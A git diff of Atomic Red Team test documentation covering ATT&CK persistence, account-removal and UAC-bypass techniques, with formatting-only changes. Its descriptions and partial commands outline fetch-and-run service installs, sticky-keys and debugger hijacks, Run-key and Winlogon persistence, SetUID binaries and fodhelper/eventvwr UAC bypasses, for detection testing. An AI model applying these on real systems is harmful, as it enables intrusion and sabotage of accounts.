## Atomic Test #9 - Reboot System via `poweroff` - Linux - -auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 - This test restarts a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 61303105-ff60-427b-999e-efb90b314e41 + + + diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md index a5dba7da..0e5483e1 100644 --- a/atomics/T1531/T1531.md +++ b/atomics/T1531/T1531.md @@ -16,14 +16,16 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows - -auto_generated_guid: 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 - Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with the password "HuHuHUHoHo283283". + **Supported Platforms:** Windows +**auto_generated_guid:** 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 + + + #### Inputs: @@ -55,13 +57,15 @@ net.exe user #{user_account} /delete >nul 2>&1
## Atomic Test #2 - Delete User - Windows - -auto_generated_guid: f21a1d7d-a62f-442a-8c3a-2440d43b19e5 - Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** f21a1d7d-a62f-442a-8c3a-2440d43b19e5 + + + #### Inputs: @@ -88,13 +92,15 @@ net.exe user #{user_account} /delete
## Atomic Test #3 - Remove Account From Domain Admin Group - -auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 - This test will remove an account from the domain admins group + **Supported Platforms:** Windows +**auto_generated_guid:** 43f71395-6c37-498e-ab17-897d814a0947 + + + #### Inputs: diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md index 33f7a5b3..5f572f48 100644 --- a/atomics/T1543.001/T1543.001.md +++ b/atomics/T1543.001/T1543.001.md @@ -12,13 +12,15 @@ Adversaries may install a new launch agent that can be configured to execute at
## Atomic Test #1 - Launch Agent - -auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - Create a plist and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + + + #### Inputs: diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index cbb857ac..7e10bdf0 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -22,13 +22,15 @@ While adversaries typically require root privileges to create/modify service uni
## Atomic Test #1 - Create Systemd Service - -auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - This test creates a Systemd service unit file and enables it as a service. + **Supported Platforms:** Linux +**auto_generated_guid:** d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + + + #### Inputs: @@ -83,13 +85,15 @@ systemctl daemon-reload
## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. - -auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 - This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + **Supported Platforms:** Linux +**auto_generated_guid:** c35ac4a8-19de-43af-b9f8-755da7e89c89 + + + diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 616ccbd2..7044982f 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -20,15 +20,17 @@ Services may be created with administrator privileges but are executed under SYS
## Atomic Test #1 - Modify Fax service to run PowerShell - -auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. + **Supported Platforms:** Windows +**auto_generated_guid:** ed366cde-7d12-49df-a833-671904770b9f + + + @@ -53,14 +55,16 @@ sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
## Atomic Test #2 - Service Installation CMD - -auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 981e2942-e433-44e9-afc1-8c957a1496b6 + + + #### Inputs: @@ -105,14 +109,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Service Installation PowerShell - -auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - Installs A Local Service via PowerShell. Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + + + #### Inputs: diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index c8f5977d..d3aaeda3 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -14,13 +14,15 @@ The plist file permissions must be root:wheel, but the script or program that it
## Atomic Test #1 - Launch Daemon - -auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - Utilize LaunchDaemon to launch `Hello World` + **Supported Platforms:** macOS +**auto_generated_guid:** 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + + + #### Inputs: diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 41cc789d..afb4141e 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -17,15 +17,17 @@ The values of the keys listed are commands that are executed when the handler op
## Atomic Test #1 - Change Default File Association - -auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - Change Default File Association From cmd.exe of hta to notepad. Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 10a08978-2045-4d62-8c42-1957bbbea102 + + + #### Inputs: diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 6b340f80..4e2640aa 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -19,13 +19,15 @@ Adversaries can use screensaver settings to maintain persistence by setting the
## Atomic Test #1 - Set Arbitrary Binary as Screensaver - -auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. + **Supported Platforms:** Windows +**auto_generated_guid:** 281201e7-de41-4dc9-b73d-f288938cbb64 + + + #### Inputs: diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md index f94ca7be..7bf968e5 100644 --- a/atomics/T1546.003/T1546.003.md +++ b/atomics/T1546.003/T1546.003.md @@ -14,9 +14,6 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
## Atomic Test #1 - Persistence via WMI Event Subscription - -auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -25,9 +22,14 @@ Code references https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + **Supported Platforms:** Windows +**auto_generated_guid:** 3c64f177-28e2-49eb-a799-d767b24dd1e0 + + + diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index 29f7920d..4299c29d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -16,13 +16,15 @@ For macOS, the functionality of this technique is similar but may leverage zsh,
## Atomic Test #1 - Add command to .bash_profile - -auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - Adds a command to the .bash_profile file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 94500ae1-7e31-47e3-886b-c328da46872f + + + #### Inputs: @@ -47,13 +49,15 @@ echo "#{command_to_add}" >> ~/.bash_profile
## Atomic Test #2 - Add command to .bashrc - -auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - Adds a command to the .bashrc file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0a898315-4cfa-4007-bafe-33a4646d115f + + + #### Inputs: diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index 7c2f996c..8520cfbd 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -12,14 +12,16 @@ Adversaries can use this to register code to be executed when the shell encounte
## Atomic Test #1 - Trap - -auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - After exiting the shell, the script will download and execute. After sending a keyboard interrupt (CTRL+C) the script will download and execute. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a74b2e07-5952-4c03-8b56-56274b076b61 + + + diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index 374d1c09..04622979 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,13 +12,15 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration - -auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - Netsh interacts with other operating system components using dynamic-link library (DLL) files + **Supported Platforms:** Windows +**auto_generated_guid:** 3244697d-5a3a-4dfc-941c-550f69f91a4d + + + #### Inputs: diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index 69ed5766..735d996a 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -26,15 +26,17 @@ Other accessibility features exist that may also be leveraged in a similar fashi
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes - -auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + + + #### Inputs: @@ -84,13 +86,15 @@ Foreach ($item in $input_table)
## Atomic Test #2 - Replace binary of sticky keys - -auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - Replace sticky keys binary (sethc.exe) with cmd.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 934e90cf-29ca-48b3-863c-411737ad44e3 + + + diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 4e7b5e57..75e6ea29 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -14,18 +14,20 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
## Atomic Test #1 - Install AppInit Shim - -auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls + **Supported Platforms:** Windows +**auto_generated_guid:** a58d9386-3080-4242-ab5f-454c16503d18 + + + #### Inputs: diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index 6b734da2..d24eac95 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -30,17 +30,19 @@ Utilizing these shims may allow an adversary to perform several malicious acts s
## Atomic Test #1 - Application Shim Installation - -auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review the source code files is the \\T1546.011\\src directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + + + #### Inputs: @@ -93,15 +95,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory - -auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** aefd6866-d753-431f-a7a4-215ca7e3f13d + + + @@ -127,16 +131,18 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -Err
## Atomic Test #3 - Registry key creation and/or modification events for SDB - -auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing the registry keys that were created. These keys can also be viewed using the Registry Editor. https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + + + diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index fb65e2d6..b9ab7202 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -22,13 +22,15 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
## Atomic Test #1 - IFEO Add Debugger - -auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** fdda2626-5234-4c90-b163-60849a24c0b8 + + + #### Inputs: @@ -58,13 +60,15 @@ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Imag
## Atomic Test #2 - IFEO Global Flags - -auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + + + #### Inputs: diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md index f3f31982..dadf2820 100644 --- a/atomics/T1546.013/T1546.013.md +++ b/atomics/T1546.013/T1546.013.md @@ -16,13 +16,15 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet - -auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896 - Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 090e5aa5-32b6-473b-a49b-21e843a56896 + + + #### Inputs: diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md index 1c3eea1b..bb146717 100644 --- a/atomics/T1546.014/T1546.014.md +++ b/atomics/T1546.014/T1546.014.md @@ -14,13 +14,15 @@ Adversaries may abuse this service by writing a rule to execute commands when a
## Atomic Test #1 - Persistance with Event Monitor - emond - -auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + **Supported Platforms:** macOS +**auto_generated_guid:** 23c9c127-322b-4c75-95ca-eff464906114 + + + #### Inputs: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 7e20060b..8db87797 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -60,15 +60,17 @@ Adversaries can use these configuration locations to execute malware, such as re
## Atomic Test #1 - Reg Key Run - -auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05 + + + #### Inputs: @@ -97,15 +99,17 @@ REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red T
## Atomic Test #2 - Reg Key RunOnce - -auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb + + + #### Inputs: @@ -134,14 +138,16 @@ REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
## Atomic Test #3 - PowerShell Registry RunOnce - -auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42 + + + #### Inputs: @@ -172,15 +178,17 @@ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ig
## Atomic Test #4 - Suspicious vbs file run from startup Folder - -auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + + + @@ -208,16 +216,18 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Suspicious jse file run from startup Folder - -auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06 + + + @@ -245,15 +255,17 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder - -auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e + + + @@ -281,13 +293,15 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta
## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder - -auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. + **Supported Platforms:** Windows +**auto_generated_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d + + + diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index a360c823..da6f3b0d 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -22,15 +22,17 @@ Adversaries may take advantage of these features to repeatedly execute malicious
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell - -auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + + + #### Inputs: @@ -59,15 +61,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell - -auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + + + #### Inputs: @@ -96,15 +100,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell - -auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** d40da266-e073-4e5a-bb8b-2b385023e5f9 + + + #### Inputs: diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md index f067e1e4..92db61ec 100644 --- a/atomics/T1547.005/T1547.005.md +++ b/atomics/T1547.005/T1547.005.md @@ -12,13 +12,15 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Test #1 - Modify SSP configuration in registry - -auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. + **Supported Platforms:** Windows +**auto_generated_guid:** afdfd7e3-8a0b-409f-85f7-886fdf249c9e + + + #### Inputs: diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index 94c10ffe..ca56ae7e 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -16,13 +16,15 @@ Adversaries can use LKMs and kexts to covertly persist on a system and elevate p
## Atomic Test #1 - Linux - Load Kernel Module via insmod - -auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - This test uses the insmod command to load a kernel module for Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 687dcb93-9656-4853-9c36-9977315e9d23 + + + #### Inputs: diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md index ef96fb9a..bbda29b0 100644 --- a/atomics/T1547.007/T1547.007.md +++ b/atomics/T1547.007/T1547.007.md @@ -14,15 +14,17 @@ An adversary can modify one of these files directly to include a link to their m
## Atomic Test #1 - Re-Opened Applications - -auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - Plist Method [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5fefd767-ef54-4ac6-84d3-751ab85e8aba + + + #### Run it with these steps! @@ -44,15 +46,17 @@ or
## Atomic Test #2 - Re-Opened Applications - -auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + + + #### Inputs: diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md index c36f9fe2..3e405cac 100644 --- a/atomics/T1547.009/T1547.009.md +++ b/atomics/T1547.009/T1547.009.md @@ -14,15 +14,17 @@ Adversaries could use shortcuts to execute their tools for persistence. They may
## Atomic Test #1 - Shortcut Modification - -auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** ce4fc678-364f-4282-af16-2fb4c78005ce + + + #### Inputs: @@ -53,14 +55,16 @@ del -f #{shortcut_file_path} >nul 2>&1
## Atomic Test #2 - Create shortcut to cmd in startup folders - -auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. + **Supported Platforms:** Windows +**auto_generated_guid:** cfdc954d-4bb0-4027-875b-a1893ce406f2 + + + diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md index db194c9d..4af13b5c 100644 --- a/atomics/T1547.010/T1547.010.md +++ b/atomics/T1547.010/T1547.010.md @@ -19,13 +19,15 @@ Adversaries can use this technique to load malicious code at startup that will p
## Atomic Test #1 - Add Port Monitor persistence in Registry - -auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + **Supported Platforms:** Windows +**auto_generated_guid:** d34ef297-f178-4462-871e-9ce618d44e50 + + + #### Inputs: diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md index 1056a105..f39ea804 100644 --- a/atomics/T1547.011/T1547.011.md +++ b/atomics/T1547.011/T1547.011.md @@ -14,13 +14,15 @@ A specific plist used for execution at login is com.apple.loginitems.plist
## Atomic Test #1 - Plist Modification - -auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - Modify MacOS plist file in one of two directories + **Supported Platforms:** macOS +**auto_generated_guid:** 394a538e-09bb-4a4a-95d1-b93cf12682a8 + + + #### Run it with these steps! diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index 79887ecd..7286cc60 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -18,13 +18,15 @@ Adversaries can use this mechanism on their own malware to make sure they're abl
## Atomic Test #1 - Make and modify binary from C source - -auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 - Make, change owner, and change file attributes on a C source code file + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 896dfe97-ae43-4101-8e96-9a7996555d80 + + + #### Inputs: @@ -59,13 +61,15 @@ sudo rm /tmp/hello.c
## Atomic Test #2 - Set a SetUID flag on file - -auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 - This test sets the SetUID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 759055b3-3885-4582-a8ec-c00c9d64dd79 + + + #### Inputs: @@ -96,13 +100,15 @@ sudo rm #{file_to_setuid}
## Atomic Test #3 - Set a SetGID flag on file - -auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c - This test sets the SetGID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** db55f666-7cba-46c6-9fe6-205a05c3242c + + + #### Inputs: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 1d8250bc..81999488 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -34,14 +34,16 @@ Another bypass is possible through some lateral movement techniques if credentia
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) - -auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 - Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + + + #### Inputs: @@ -71,14 +73,16 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) - -auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b - PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** a6ce9acf-842a-4af6-8f79-539be7608e2b + + + #### Inputs: @@ -109,14 +113,16 @@ Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
## Atomic Test #3 - Bypass UAC using Fodhelper - -auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 - Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 58f641ea-12e3-499a-b684-44dee46bd182 + + + #### Inputs: @@ -147,14 +153,16 @@ reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
